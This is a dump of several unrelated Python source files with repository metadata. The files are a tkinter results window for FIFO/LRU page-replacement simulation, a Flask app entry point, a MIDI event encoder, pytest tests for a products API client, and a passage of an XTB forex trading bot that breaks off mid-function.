Jcollier722/PageRemoval
|
ec14cd3927bbb754883a6a3dcff312ba90cd45db
|
[
"Apache-2.0"
] | null | null | null |
menu/show_results.py
|
Jcollier722/PageRemoval
|
ec14cd3927bbb754883a6a3dcff312ba90cd45db
|
[
"Apache-2.0"
] | null | null | null |
menu/show_results.py
|
Jcollier722/PageRemoval
|
ec14cd3927bbb754883a6a3dcff312ba90cd45db
|
[
"Apache-2.0"
] | null | null | null |
"""This file is the results window"""
import sys
sys.path.insert(0, 'menu/')
sys.path.insert(1, 'util/')
sys.path.insert(2, 'sim/')
import tkinter as tk
import menu
import import_jobs as ij
import validate_jobs as validate
import show_results as sr
import export_results as xr
import compare_sim
import const
import simulation
from tkinter import ttk
from tkinter.filedialog import askopenfile
from tkinter.filedialog import asksaveasfile
def make_results(self):
#if job list is too long, just export to spreadsheet and show comparison
if(len(self.job_list)>11):
tk.messagebox.showwarning('Warning','Your job list is large and will be exported to a spreadsheet instead. Please select a save location.')
files = [('Spreadsheet','.xlsx')]
path = asksaveasfile(filetypes = files, defaultextension = files)
xr.export(path,self.fifo_events,self.fifo_inter,self.lru_events,self.lru_inter,self.job_list)
tk.messagebox.showinfo('Saved','Spreadsheet generated successfully')
compare_sim.compare(['FIFO','LRU'],[self.fifo_num_inter,self.lru_num_inter])
return
self.count = self.count + 1
self.window=tk.Toplevel(self)
self.window.geometry("825x900")
self.window.config(bg='#bfd7ff')
self.window.resizable(width=False, height=False)
root = self.window
menu = tk.Canvas(root,width=815,height=const.MAX_HEIGHT/8,bg=const.BLUE,bd=2)
menu.config(highlightbackground='black')
menu.place(relx=0)
#Title
title = tk.Label(menu,text=const.RESULT_TITLE,font='arial 30 bold ',bg=const.BLUE).place(relx=.5,rely=0.40,anchor="center")
fifo_view = tk.Button(menu,text=const.FIFO_TITLE,font='arial 12 bold',height=1,width=10,bg=const.GREEN,command=self.show_fifo).place(relx=0.3,rely=0.75,anchor="w")
lru_view = tk.Button(menu,text=const.LRU_TITLE,font='arial 12 bold',height=1,width=10,bg=const.GREEN,command=self.show_lru).place(relx=0.58,rely=0.75,anchor="w")
compare = tk.Button(root,text="Compare Algorithms",font='arial 12 bold',height=3,width=30,bg=const.GREEN,command=self.compare_sim).place(relx=0.3,rely=0.95,anchor="w")
#**********************************************************************************************************************************************fifo frame
self.fifo = tk.Canvas(root,width=815,height=const.MAX_HEIGHT/1,bg=const.BLUE,bd=2)
fifo = self.fifo
fifo.config(highlightbackground='black')
fifo.place(relx=0,rely=.10)
#fifo title
title = tk.Label(fifo,text=const.FIFO_TITLE,font='arial 20 bold underline',bg=const.BLUE).place(relx=0.01,rely=0.10,anchor="w")
fifo_y = const.START_Y+.10
#print each page frame
for i in range(self.page_frame_count):
this_text = "Page Frame "+str(i+1)
this_label = tk.Label(fifo,text=this_text,font= "arial 15 bold",borderwidth=3,relief='groove',pady=7,padx=10)
this_label.place(relx=0.01,rely=fifo_y)
fifo_y = fifo_y + 0.07
"""
Lots of magic numbers here, will move to const.py if time allows for this assignment.
"""
#print the jobs each page frame has at each moment
y_fifo_jobs = const.START_Y+.10
x_fifo_jobs = self.x+.17
for i in range(self.page_frame_count):
for event_list in self.fifo_events:
if(str(event_list.frame) == str(i+1)):
for e in event_list.event:
if e is None:
e="-"
tk.Label(fifo,text=str(e),font= "arial 10 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_fifo_jobs,rely=y_fifo_jobs)
x_fifo_jobs = x_fifo_jobs + .07
y_fifo_jobs = y_fifo_jobs +0.07
x_fifo_jobs = self.x+.17
#move jobs to right of labels
x_fifo_jobs = self.x+.17
y_fifo_jobs = y_fifo_jobs +0.05
tk.Label(fifo,text=const.REQ,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=0.01,rely=y_fifo_jobs)
for job in self.job_list:
tk.Label(fifo,text=str(job),font= "arial 10 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_fifo_jobs,rely=y_fifo_jobs)
x_fifo_jobs = x_fifo_jobs + .07
x_fifo_jobs = self.x+.17
y_fifo_jobs=y_fifo_jobs +0.07
tk.Label(fifo,text=const.INTER,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=40).place(relx=0.01,rely=y_fifo_jobs)
for inter in self.fifo_inter:
tk.Label(fifo,text=str(inter),font= "arial 13 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_fifo_jobs,rely=y_fifo_jobs)
x_fifo_jobs = x_fifo_jobs + .07
y_fifo_jobs=y_fifo_jobs +0.07
x_fifo_jobs = self.x+.17
tk.Label(fifo,text=const.TIME,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=15).place(relx=0.01,rely=y_fifo_jobs)
for i in range(len(self.job_list)):
tk.Label(fifo,text=str(i+1),font= "arial 11 ",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_fifo_jobs,rely=y_fifo_jobs)
x_fifo_jobs = x_fifo_jobs + .07
y_fifo_jobs=y_fifo_jobs +0.07
y_fifo_jobs=y_fifo_jobs +0.07
num_inter = str((self.fifo_num_inter))
num_req = str(len(self.job_list))
fifo_fail = str(self.fifo_fail*100)+"%"
results = "Total Interrupts: "+num_inter+"\n"+"Total Requests: "+ num_req + "\n" + "Failure Rate: "+fifo_fail
tk.Label(fifo,text=results,font= "arial 15 bold ").place(relx=0.01,rely=y_fifo_jobs)
#**********************************************************************************************************************************************lru frame
self.lru = tk.Canvas(root,width=815,height=const.MAX_HEIGHT/1,bg=const.BLUE,bd=2)
lru = self.lru
lru.config(highlightbackground='black')
#lru.place(relx=0,rely=.10)
#lru title
title = tk.Label(lru,text=const.LRU_TITLE,font='arial 20 bold underline',bg=const.BLUE).place(relx=0.01,rely=0.10,anchor="w")
lru_y = const.START_Y+.10
#print each page frame
for i in range(self.page_frame_count):
this_text = "Page Frame "+str(i+1)
this_label = tk.Label(lru,text=this_text,font= "arial 15 bold",borderwidth=3,relief='groove',pady=7,padx=10)
this_label.place(relx=0.01,rely=lru_y)
lru_y = lru_y + 0.07
"""
Lots of magic numbers here, will move to const.py if time allows for this assignment.
"""
#print the jobs each page frame has at each moment
y_lru_jobs = const.START_Y+.10
x_lru_jobs = self.x+.17
for i in range(self.page_frame_count):
for event_list in self.lru_events:
if(str(event_list.frame) == str(i+1)):
for e in event_list.event:
if e is None:
e="-"
tk.Label(lru,text=str(e),font= "arial 10 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_lru_jobs,rely=y_lru_jobs)
x_lru_jobs = x_lru_jobs + .07
y_lru_jobs = y_lru_jobs +0.07
x_lru_jobs = self.x+.17
#move jobs to right of labels
x_lru_jobs = self.x+.17
y_lru_jobs = y_lru_jobs +0.05
tk.Label(lru,text=const.REQ,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=0.01,rely=y_lru_jobs)
for job in self.job_list:
tk.Label(lru,text=str(job),font= "arial 10 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_lru_jobs,rely=y_lru_jobs)
x_lru_jobs = x_lru_jobs + .07
x_lru_jobs = self.x+.17
y_lru_jobs=y_lru_jobs +0.07
tk.Label(lru,text=const.INTER,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=40).place(relx=0.01,rely=y_lru_jobs)
for inter in self.lru_inter:
tk.Label(lru,text=str(inter),font= "arial 13 bold",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_lru_jobs,rely=y_lru_jobs)
x_lru_jobs = x_lru_jobs + .07
y_lru_jobs=y_lru_jobs +0.07
x_lru_jobs = self.x+.17
tk.Label(lru,text=const.TIME,font= "arial 12 bold",borderwidth=3,relief='groove',pady=7,padx=15).place(relx=0.01,rely=y_lru_jobs)
for i in range(len(self.job_list)):
tk.Label(lru,text=str(i+1),font= "arial 11 ",borderwidth=3,relief='groove',pady=7,padx=10).place(relx=x_lru_jobs,rely=y_lru_jobs)
x_lru_jobs = x_lru_jobs + .07
y_lru_jobs=y_lru_jobs +0.07
y_lru_jobs=y_lru_jobs +0.07
num_inter = str((self.lru_num_inter))
num_req = str(len(self.job_list))
lru_fail = str(self.lru_fail*100)+"%"
results = "Total Interrupts: "+num_inter+"\n"+"Total Requests: "+ num_req + "\n" + "Failure Rate: "+lru_fail
tk.Label(lru,text=results,font= "arial 15 bold ").place(relx=0.01,rely=y_lru_jobs)
| 46.020619 | 172 | 0.635529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,841 | 0.206205 |
1fa185f55ac389ddda6ff7507b5d50529d297d77
| 539 |
py
|
Python
|
index.py
|
eddowh/flask-react-gae-multiuser-blog
|
7979567455936d32ba55c6edf0df82c4670754ef
|
[
"Unlicense"
] | 1 |
2016-10-25T10:12:58.000Z
|
2016-10-25T10:12:58.000Z
|
index.py
|
eddowh/flask-react-gae-multiuser-blog
|
7979567455936d32ba55c6edf0df82c4670754ef
|
[
"Unlicense"
] | null | null | null |
index.py
|
eddowh/flask-react-gae-multiuser-blog
|
7979567455936d32ba55c6edf0df82c4670754ef
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
from importlib import import_module
import os
import sys
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
APP_NAME = 'server'
SYS_DIRS = [
'lib',
]
# add directories to sys path
for dir in SYS_DIRS + [APP_NAME]:
sys.path.insert(1, os.path.join(BASE_PATH, dir))
# register flask configuration environment variable
SETTINGS_FILEPATH = os.path.join(BASE_PATH, 'priv.cfg')
os.environ.setdefault("FLASK_CONF", SETTINGS_FILEPATH)
# for starting GAE
globals().update(import_module(APP_NAME).__dict__)
| 21.56 | 55 | 0.742115 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 156 | 0.289425 |
1fa2167771953e0aff81f31c29233d456380649d
| 67 |
py
|
Python
|
latex/slides/resources/01_getting_started/present_main.py
|
AntonObersteiner/python-lessons
|
1d5536f0777853fba437566672cfb1d613984945
|
[
"CC-BY-4.0"
] | null | null | null |
latex/slides/resources/01_getting_started/present_main.py
|
AntonObersteiner/python-lessons
|
1d5536f0777853fba437566672cfb1d613984945
|
[
"CC-BY-4.0"
] | null | null | null |
latex/slides/resources/01_getting_started/present_main.py
|
AntonObersteiner/python-lessons
|
1d5536f0777853fba437566672cfb1d613984945
|
[
"CC-BY-4.0"
] | null | null | null |
print(present("Py-Kurs", "am Di in der 5.", "dem FSR-Kurssystem"))
| 33.5 | 66 | 0.656716 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 46 | 0.686567 |
1fa40e3d5ffd5031f4b30a989255c4474dd77b5f
| 9,440 |
py
|
Python
|
POP909-Dataset-master/data_process/processor.py
|
agurdins/RTU_Bachelor
|
28ed4bf90a8ffdb2b599e549bae5f2b12a795ff1
|
[
"Apache-2.0"
] | 140 |
2020-08-06T12:15:56.000Z
|
2022-03-26T11:02:36.000Z
|
POP909-Dataset-master/data_process/processor.py
|
agurdins/RTU_Bachelor
|
28ed4bf90a8ffdb2b599e549bae5f2b12a795ff1
|
[
"Apache-2.0"
] | 5 |
2020-08-18T08:29:46.000Z
|
2021-09-25T16:56:49.000Z
|
POP909-Dataset-master/data_process/processor.py
|
agurdins/RTU_Bachelor
|
28ed4bf90a8ffdb2b599e549bae5f2b12a795ff1
|
[
"Apache-2.0"
] | 18 |
2020-09-21T07:13:44.000Z
|
2022-03-19T14:30:09.000Z
|
"""
Representation Processor
============
These are core classes of representation processor.
Repr Processor: the basic representation processor
- Event Processor
"""
import numpy as np
from abc import ABC, abstractmethod
import pretty_midi as pyd
class ReprProcessor(ABC):
"""Abstract base class severing as the representation processor.
It provides the following abstract methods.
- encode(self, note_seq): encode the note sequence into the representation sequence.
- decode(self, repr_seq): decode the representation sequence into the note sequence.
Notes
-----
The base representation processor class includes the convertion between the note sequence and the representation sequence.
In general, we assume the input note sequence has already been quantized.
In that, the smallest unit of the quantization is actually 1 tick no matter what resolution is.
If you init "min_step" to be larger than 1, we assume you wish to compress all the base tick.
e.g. min_step = 2, then the whole ticks will be convertd half.
If you do this, the representation convertion may not be 100% correct.
-----
"""
def __init__(self, min_step: int = 1):
self.min_step = min_step
def _compress(self, note_seq=None):
"""Return the compressed note_seq based on the min_step > 1.
Parameters
----------
note_seq : Note Array.
----------
WARNING: If you do this, the representation convertion may not be 100% correct.
"""
new_note_seq = [
Note(
start=int(d.start / self.min_step),
end=int(d.end / self.min_step),
pitch=d.pitch,
velocity=d.velocity,
)
for d in note_seq
]
return new_note_seq
def _expand(self, note_seq=None):
"""Return the expanded note_seq based on the min_step > 1.
Parameters
----------
note_seq : Note Array.
----------
WARNING: If you do this, the representation convertion may not be 100% correct.
"""
new_note_seq = [
Note(
start=int(d.start * self.min_step),
end=int(d.end * self.min_step),
pitch=d.pitch,
velocity=d.velocity,
)
for d in note_seq
]
return new_note_seq
@abstractmethod
def encode(self, note_seq=None):
"""encode the note sequence into the representation sequence.
Parameters
----------
note_seq= the input {Note} sequence
Returns
----------
repr_seq: the representation numpy sequence
"""
@abstractmethod
def decode(self, repr_seq=None):
"""decode the representation sequence into the note sequence.
Parameters
----------
repr_seq: the representation numpy sequence
Returns
----------
note_seq= the input {Note} sequence
"""
class MidiEventProcessor(ReprProcessor):
"""Midi Event Representation Processor.
Representation Format:
-----
Size: L * D:
- L for the sequence (event) length
- D = 1 {
0-127: note-on event,
128-255: note-off event,
256-355(default):
tick-shift event
256 for one tick, 355 for 100 ticks
the maximum number of tick-shift can be specified
356-388 (default):
velocity event
the maximum number of quantized velocity can be specified
}
Parameters:
-----
min_step(optional):
minimum quantification step
decide how many ticks to be the basic unit (default = 1)
tick_dim(optional):
tick-shift event dimensions
the maximum number of tick-shift (default = 100)
velocity_dim(optional):
velocity event dimensions
the maximum number of quantized velocity (default = 32, max = 128)
e.g.
[C5 - - - E5 - - / G5 - - / /]
->
[380, 60, 259, 188, 64, 258, 192, 256, 67, 258, 195, 257]
"""
def __init__(self, **kwargs):
self.name = "midievent"
min_step = 1
if "min_step" in kwargs:
min_step = kwargs["min_step"]
super(MidiEventProcessor, self).__init__(min_step)
self.tick_dim = 100
self.velocity_dim = 32
if "tick_dim" in kwargs:
self.tick_dim = kwargs["tick_dim"]
if "velocity_dim" in kwargs:
self.velocity_dim = kwargs["velocity_dim"]
if self.velocity_dim > 128:
raise ValueError(
"velocity_dim cannot be larger than 128", self.velocity_dim
)
self.max_vocab = 256 + self.tick_dim + self.velocity_dim
self.start_index = {
"note_on": 0,
"note_off": 128,
"time_shift": 256,
"velocity": 256 + self.tick_dim,
}
def encode(self, note_seq=None):
"""Return the note token
Parameters
----------
note_seq : Note List.
Returns
----------
repr_seq: Representation List
"""
if note_seq is None:
return []
if self.min_step > 1:
note_seq = self._compress(note_seq)
notes = note_seq
events = []
meta_events = []
for note in notes:
token_on = {
"name": "note_on",
"time": note.start,
"pitch": note.pitch,
"vel": note.velocity,
}
token_off = {
"name": "note_off",
"time": note.end,
"pitch": note.pitch,
"vel": None,
}
meta_events.extend([token_on, token_off])
meta_events.sort(key=lambda x: x["pitch"])
meta_events.sort(key=lambda x: x["time"])
time_shift = 0
cur_vel = 0
for me in meta_events:
duration = int((me["time"] - time_shift) * 100)
while duration >= self.tick_dim:
events.append(
self.start_index["time_shift"] + self.tick_dim - 1
)
duration -= self.tick_dim
if duration > 0:
events.append(self.start_index["time_shift"] + duration - 1)
if me["vel"] is not None:
if cur_vel != me["vel"]:
cur_vel = me["vel"]
events.append(
self.start_index["velocity"]
+ int(round(me["vel"] * self.velocity_dim / 128))
)
events.append(self.start_index[me["name"]] + me["pitch"])
time_shift = me["time"]
return events
def decode(self, repr_seq=None):
"""Return the note seq
Parameters
----------
repr_seq: Representation Sequence List
Returns
----------
note_seq : Note List.
"""
if repr_seq is None:
return []
time_shift = 0.0
cur_vel = 0
meta_events = []
note_on_dict = {}
notes = []
for e in repr_seq:
if self.start_index["note_on"] <= e < self.start_index["note_off"]:
token_on = {
"name": "note_on",
"time": time_shift,
"pitch": e,
"vel": cur_vel,
}
meta_events.append(token_on)
if (
self.start_index["note_off"]
<= e
< self.start_index["time_shift"]
):
token_off = {
"name": "note_off",
"time": time_shift,
"pitch": e - self.start_index["note_off"],
"vel": cur_vel,
}
meta_events.append(token_off)
if (
self.start_index["time_shift"]
<= e
< self.start_index["velocity"]
):
time_shift += (e - self.start_index["time_shift"] + 1) * 0.01
if self.start_index["velocity"] <= e < self.max_vocab:
cur_vel = int(round(
(e - self.start_index["velocity"])
* 128
/ self.velocity_dim)
)
skip_notes = []
for me in meta_events:
if me["name"] == "note_on":
note_on_dict[me["pitch"]] = me
elif me["name"] == "note_off":
try:
token_on = note_on_dict[me["pitch"]]
token_off = me
if token_on["time"] == token_off["time"]:
continue
notes.append(
pyd.Note(
velocity=token_on["vel"],
pitch=int(token_on["pitch"]),
start=token_on["time"],
end=token_off["time"],
)
)
except:
skip_notes.append(me)
notes.sort(key=lambda x: x.start)
if self.min_step > 1:
notes = self._expand(notes)
return notes
| 30.550162 | 126 | 0.500953 | 9,177 | 0.97214 | 0 | 0 | 612 | 0.064831 | 0 | 0 | 4,065 | 0.430614 |
1fa55ad9cf461decaa935b9ad2c9830d3dd93f16
| 5,521 |
py
|
Python
|
tests/test_products.py
|
lukeshiner/ccp_api
|
5bd8a075108df4983b62197ea950e14297f5ad19
|
[
"MIT"
] | null | null | null |
tests/test_products.py
|
lukeshiner/ccp_api
|
5bd8a075108df4983b62197ea950e14297f5ad19
|
[
"MIT"
] | null | null | null |
tests/test_products.py
|
lukeshiner/ccp_api
|
5bd8a075108df4983b62197ea950e14297f5ad19
|
[
"MIT"
] | null | null | null |
import ccp_api
import pytest
from .test_ccp_api import Base_ccp_api_Test
class TestProducts(Base_ccp_api_Test):
@pytest.fixture
def products_wsdl(self, file_fixture):
return file_fixture("products", "wsdl.xml")
@pytest.fixture
def product_by_ID_response(self, file_fixture):
return file_fixture("products", "get_product_by_ID_response.xml")
@pytest.fixture
def get_product_by_ID_failed_response(self, file_fixture):
return file_fixture("products", "get_product_by_ID_failed_response.xml")
@pytest.fixture
def product_by_SKU_response(self, file_fixture):
return file_fixture("products", "get_product_by_SKU_response.xml")
@pytest.fixture
def get_product_by_SKU_empty_response(self, file_fixture):
return file_fixture("products", "get_product_by_SKU_empty_response.xml")
@pytest.fixture
def product_by_barcode_response(self, file_fixture):
return file_fixture("products", "get_product_by_barcode_response.xml")
@pytest.fixture
def get_products_by_barcode_empty_response(self, file_fixture):
return file_fixture("products", "get_products_by_barcode_empty_response.xml")
@pytest.fixture
def get_active_sales_channels_response(self, file_fixture):
return file_fixture("products", "get_active_sales_channels_response.xml")
@pytest.fixture
def get_product_images_response(self, file_fixture):
return file_fixture("products", "get_product_images_response.xml")
@pytest.fixture
def get_product_images_empty_response(self, file_fixture):
return file_fixture("products", "get_product_images_empty_response.xml")
@pytest.fixture
def set_external_product_ID_response(self, file_fixture):
return file_fixture("products", "set_external_product_ID_response.xml")
class Test_get_product_by_ID(TestProducts):
def test_product_by_ID_returns_a_product(
self, mock_product_method, product_by_ID_response
):
mock_product_method(text=product_by_ID_response)
response = ccp_api.products.get_product_by_ID("1234864")
assert response.Name == "Ladies Hooded Cotton Terry Towelling Robe"
def test_get_product_by_ID_raises_when_no_product_matches(
self, mock_product_method, get_product_by_ID_failed_response
):
mock_product_method(text=get_product_by_ID_failed_response, status_code=500)
with pytest.raises(ccp_api.exceptions.ResponseError):
ccp_api.products.get_product_by_ID("1234864")
class Test_get_product_by_SKU(TestProducts):
def test_product_by_SKU_returns_a_product(
self, mock_product_method, product_by_SKU_response
):
mock_product_method(text=product_by_SKU_response)
response = ccp_api.products.get_product_by_SKU("ABC_DEF_GHI")
assert response.Name == "Ladies Hooded Cotton Terry Towelling Robe"
def test_get_product_by_SKU_returns_None_when_no_match_is_found(
self, mock_product_method, get_product_by_SKU_empty_response
):
mock_product_method(text=get_product_by_SKU_empty_response)
response = ccp_api.products.get_product_by_SKU("ABC_DEF_GHI")
assert response is None
class Test_get_product_by_barcode(TestProducts):
def test_product_by_barcode_returns_a_product(
self, mock_product_method, product_by_barcode_response
):
mock_product_method(text=product_by_barcode_response)
response = ccp_api.products.get_product_by_barcode("7106544676954")
assert response.Name == "Ladies Hooded Cotton Terry Towelling Robe"
def test_get_product_by_barcode_returns_None_when_no_match_is_found(
self, mock_product_method, get_products_by_barcode_empty_response
):
mock_product_method(text=get_products_by_barcode_empty_response)
response = ccp_api.products.get_product_by_barcode("7106544676954")
assert response is None
class Test_get_product_by_get_active_sales_channels(TestProducts):
def test_get_active_sales_channels_returns_sales_channels_information(
self, mock_product_method, get_active_sales_channels_response
):
mock_product_method(text=get_active_sales_channels_response)
response = ccp_api.products.get_active_sales_channels()
assert response[0].ID == 3541
class Test_get_product_images(TestProducts):
def test_get_product_images_returns_product_image_information(
self, mock_product_method, get_product_images_response
):
mock_product_method(text=get_product_images_response)
response = ccp_api.products.get_product_images("1234864")
assert response[0].ID == 14601918
def test_get_product_images_returns_empty_list_when_no_images_exist(
self, mock_product_method, get_product_images_empty_response
):
mock_product_method(text=get_product_images_empty_response)
returned_value = ccp_api.products.get_product_images("1234864")
assert returned_value == []
class Test_set_external_product_id(TestProducts):
def test_set_external_product_id(
self,
mock_product_method,
product_by_ID_response,
set_external_product_ID_response,
):
mock_product_method(text=product_by_ID_response)
product = ccp_api.products.get_product_by_ID("1234864")
mock_product_method(text=set_external_product_ID_response)
response = ccp_api.products.set_external_product_ID(product, "a001")
assert response is True
| 40.007246 | 85 | 0.768339 | 5,426 | 0.982793 | 0 | 0 | 1,656 | 0.299946 | 0 | 0 | 730 | 0.132222 |
1fa567e6eb55b654152cc249c03df4836f9c4a5f
| 340 |
py
|
Python
|
restart/TokenyjcL/Float.py
|
yujiecong/yjcL
|
6d6dc4ad3611cb34c07192a1a3038a1ac3f67d6c
|
[
"MIT"
] | null | null | null |
restart/TokenyjcL/Float.py
|
yujiecong/yjcL
|
6d6dc4ad3611cb34c07192a1a3038a1ac3f67d6c
|
[
"MIT"
] | null | null | null |
restart/TokenyjcL/Float.py
|
yujiecong/yjcL
|
6d6dc4ad3611cb34c07192a1a3038a1ac3f67d6c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@IDE :PyCharm
@Project :yjcL
@USER :yanyin
@File :Float.py
@Author :yujiecong
@Date :2021/9/1 16:19
'''
from restart.TokenyjcL.Token import Token_yjcL
class Float_yjcL(Token_yjcL):
def __init__(self,valueDict):
super(Float_yjcL, self).__init__(valueDict)
| 21.25 | 51 | 0.652941 | 115 | 0.338235 | 0 | 0 | 0 | 0 | 0 | 0 | 173 | 0.508824 |
1fa5b81e8ddb69f6e5c8f48345327239689cae22
| 19,461 |
py
|
Python
|
xtb_trading.py
|
lemassykoi/XTBApi
|
3b159f0b711e0d445a9cd7fec5c7a499cc623140
|
[
"MIT"
] | null | null | null |
xtb_trading.py
|
lemassykoi/XTBApi
|
3b159f0b711e0d445a9cd7fec5c7a499cc623140
|
[
"MIT"
] | null | null | null |
xtb_trading.py
|
lemassykoi/XTBApi
|
3b159f0b711e0d445a9cd7fec5c7a499cc623140
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# adaptation du script FXCM pour XTB
##
debug = 1 ## DEBUG ENABLED OR DISABLED
from XTBApi.api import *
import time
import pandas as pd
import datetime as dt
import talib.abstract as ta
## Maths modules
import pyti.bollinger_bands as bb
from pyti.relative_strength_index import relative_strength_index as rsi
from pyti.bollinger_bands import upper_bollinger_band as ubb
from pyti.bollinger_bands import middle_bollinger_band as mbb
from pyti.bollinger_bands import lower_bollinger_band as lbb
from pyti.bollinger_bands import percent_bandwidth as percent_b
import requests
import sys, traceback
from os import system
from pprint import pprint
##
## SPINNER FUNC
##
import threading
import itertools
class Spinner:
def __init__(self, message, delay=0.05):
#self.spinner = itertools.cycle(['-', '/', '|', '\\']) # anti horaire
self.spinner = itertools.cycle(['-', '\\', '|', '/']) # horaire
self.delay = delay
self.busy = False
self.spinner_visible = False
sys.stdout.write(message)
def write_next(self):
with self._screen_lock:
if not self.spinner_visible:
sys.stdout.write(next(self.spinner))
self.spinner_visible = True
sys.stdout.flush()
def remove_spinner(self, cleanup=False):
with self._screen_lock:
if self.spinner_visible:
sys.stdout.write('\b')
self.spinner_visible = False
if cleanup:
sys.stdout.write(' ') # overwrite spinner with blank
sys.stdout.write('\r') # move to next line
sys.stdout.flush()
def spinner_task(self):
while self.busy:
self.write_next()
time.sleep(self.delay)
self.remove_spinner()
def __enter__(self):
if sys.stdout.isatty():
self._screen_lock = threading.Lock()
self.busy = True
self.thread = threading.Thread(target=self.spinner_task)
self.thread.start()
def __exit__(self, exception, value, tb):
if sys.stdout.isatty():
self.busy = False
self.remove_spinner(cleanup=True)
else:
sys.stdout.write('\r')
##
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def NotifyLogDebug(Message):
LOGGER.debug(Message)
requests.get('https://api.telegram.org/bot' + TG_token + '/sendMessage?chat_id=' + TG_chat_id + '&text=' + Message)
def NotifyLogInfo(Message):
LOGGER.info(Message)
requests.get('https://api.telegram.org/bot' + TG_token + '/sendMessage?chat_id=' + TG_chat_id + '&text=' + Message)
def NotifyLogWarning(Message):
LOGGER.warning(Message)
requests.get('https://api.telegram.org/bot' + TG_token + '/sendMessage?chat_id=' + TG_chat_id + '&text=' + Message)
def NotifyLogError(Message):
LOGGER.error(Message)
requests.get('https://api.telegram.org/bot' + TG_token + '/sendMessage?chat_id=' + TG_chat_id + '&text=' + Message)
def NotifyLogCritical(Message):
LOGGER.critical(Message)
requests.get('https://api.telegram.org/bot' + TG_token + '/sendMessage?chat_id=' + TG_chat_id + '&text=' + Message)
def NormalExit():
client.logout()
LOGGER.info('Logged Out : Script Exited Normally')
sys.exit()
if debug == 1: print(f"{bcolors.WARNING} DEBUG IS ON{bcolors.ENDC}")
## LOGGER LEVEL
LOGGER.setLevel(logging.INFO)
##
pricedata = None
timeframe = 'm1' ## TIMEFRAME (m1, m5, m15, m30, H1,H2,H3,H4,H6,H8,D1, W1, M1)
mn_timeframe = 60 ## Minutes (60, 300, 900, 1800, 3600, 14400, 86400, 604800, 2592000)
numberofcandles = 300 ## minimum 35 pour calcul MACD
symbol = 'EURUSD'
xtb_login = '1234567'
xtb_pass = 'myComplexPassword'
TG_chat_id='123456789'
TG_token='1234567890:aBcDeFgHiJkLmNoPqRsTuVwXyZ012345678'
amount = 0.1
objectif_percent_sell = 1.02
objectif_percent_buy = 0.98
min_objectif_amount_sell = 50
trailing_step = 150
##
rsi_periods = 14
bb_periods = 20
bb_standard_deviations = 2.0
upper_rsi = 72
lower_rsi = 28
version = '20210127-0110'
## INIT XTB CONNEXION
NotifyLogInfo('Starting XTB Bot Tests')
client = Client()
client.login(xtb_login, xtb_pass, mode='real')
## Check if Market is Opened or Closed # return an array with 'symbol : Bool'
is_opened = client.check_if_market_open([symbol])
if is_opened[symbol] == False:
print('==MARKET IS CLOSED==')
NormalExit()
# This function runs once at the beginning of the strategy to run initial one-time processes
def Prepare():
global pricedata
if debug == 1: print(f"{bcolors.HEADER}Requesting Initial Price Data...{bcolors.ENDC}")
d = client.get_lastn_candle_history([symbol], mn_timeframe, numberofcandles)
pricedata = pd.DataFrame(data=d)
if debug == 1: print(f"{bcolors.OKGREEN}Initial Price Data Received...{bcolors.ENDC}")
print('')
## DEBUG LIGHT
#print(pricedata)
## DEBUG FULL
#print(pricedata.to_string())
print('')
# Get latest close bar prices and run Update() function every close of bar/candle
def StrategyHeartBeat():
while True:
currenttime = dt.datetime.now()
if timeframe == "m1" and currenttime.second == 0 and getLatestPriceData():
Update()
elif timeframe == "m5" and currenttime.second == 0 and currenttime.minute % 5 == 0 and getLatestPriceData():
Update()
with Spinner('Waiting for m5 bar...'):
time.sleep(240)
elif timeframe == "m15" and currenttime.second == 0 and currenttime.minute % 15 == 0 and getLatestPriceData():
Update()
with Spinner('Waiting for m15 bar...'):
time.sleep(840)
elif timeframe == "m30" and currenttime.second == 0 and currenttime.minute % 30 == 0 and getLatestPriceData():
Update()
with Spinner('Waiting for m30 bar...'):
time.sleep(1740)
elif currenttime.second == 0 and currenttime.minute == 0 and getLatestPriceData():
Update()
with Spinner('Waiting for H1 bar...'):
time.sleep(3540)
with Spinner('Waiting for m1 bar...'):
time.sleep(1)
# Returns True when pricedata is properly updated
def getLatestPriceData():
global pricedata
# Normal operation will update pricedata on first attempt
d = client.get_lastn_candle_history([symbol], mn_timeframe, numberofcandles)
new_pricedata = pd.DataFrame(data=d)
if new_pricedata['timestamp'][len(new_pricedata['timestamp'])-1] != pricedata['timestamp'][len(pricedata['timestamp'])-1]:
pricedata = new_pricedata
return True
counter = 0
# If data is not available on first attempt, try up to 6 times to update pricedata
while new_pricedata['timestamp'][len(new_pricedata['timestamp'])-1] == pricedata['timestamp'][len(pricedata['timestamp'])-1] and counter < 6:
print(f"{bcolors.BOLD}No updated prices found, trying again in 10 seconds...{bcolors.ENDC}")
print("")
counter+=1
with Spinner('Still waiting for next bar...'):
time.sleep(10)
d = client.get_lastn_candle_history([symbol], mn_timeframe, numberofcandles)
new_pricedata = pd.DataFrame(data=d)
if new_pricedata['timestamp'][len(new_pricedata['timestamp'])-1] != pricedata['timestamp'][len(pricedata['timestamp'])-1]:
pricedata = new_pricedata
return True
else:
return False
# Returns true if stream1 crossed over stream2 in most recent candle, stream2 can be integer/float or data array
def crossesOver(stream1, stream2):
